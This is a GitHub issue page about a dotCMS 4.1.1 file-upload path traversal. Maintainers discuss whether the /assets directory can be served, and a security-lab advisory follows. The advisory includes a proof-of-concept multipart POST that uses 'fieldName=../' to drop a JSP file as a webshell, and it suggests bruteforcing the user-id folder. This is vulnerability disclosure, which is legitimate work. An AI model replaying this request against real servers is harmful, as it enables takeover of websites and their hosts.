New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
/assets directory accessible via web request #12131
Comments
|
While this could be tighter, the /assets directory is a disallowed path in dotcms and no file can be served from that path unless it is circumvented: This means that
cannot be accessed via a web request. Please comment if this is incorrect. |
|
@wezell I think you got something wrong ! I just tested your demo site, show you my jsp file: |
|
@kimiizhang thank you for proving me wrong! That path should not be allowed and we will take a look at it. |
|
PR: #12134 |
|
Unable to reproduce in the last master... |

==========================
Author: M3@pandas From DBAppSecurity Security Lab
Affected Version: 4.1.1 the latest version
Vulnerable cgi:
/dotcms_4.1.1_999999.jar!/com/dotmarketing/servlets/AjaxFileUploadServlet.class:
tempUserFolder can be controlled through paramter 'fieldName', the upload data is not filtered and the uploaded path can be user-defined,so attacker with the administrator authority can upload evil jsp webshell file to control the whole web site or even the web server.
==========================
POC && EXP
Login as administrator
POST /servlets/ajax_file_upload?fieldName=../ HTTP/1.1
Host: 192.168.1.204:8080
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------1234995635
Cookie: your own cookies
Connection: close
Content-Length: 138
----------1234995635
Content-Disposition: form-data; name="xxx"; filename="test.jsp"
<% out.print("test_for_fun!");%>
----------1234995635--
shell is : http://192.168.1.204:8080/assets/tmp_upload/test.jsp
Attension: In some other cases: 'filedName=' , then shell will be in 'assets/tmp_upload/dotcms.org.1/' like this:http://192.168.1.204:8080/assets/tmp_upload/dotcms.org.1/test.jsp , 'dotcms.org.1' is your userid, even if you do not know your userid, you can bruteforce the number behind ' dotcms.org.' .
The text was updated successfully, but these errors were encountered: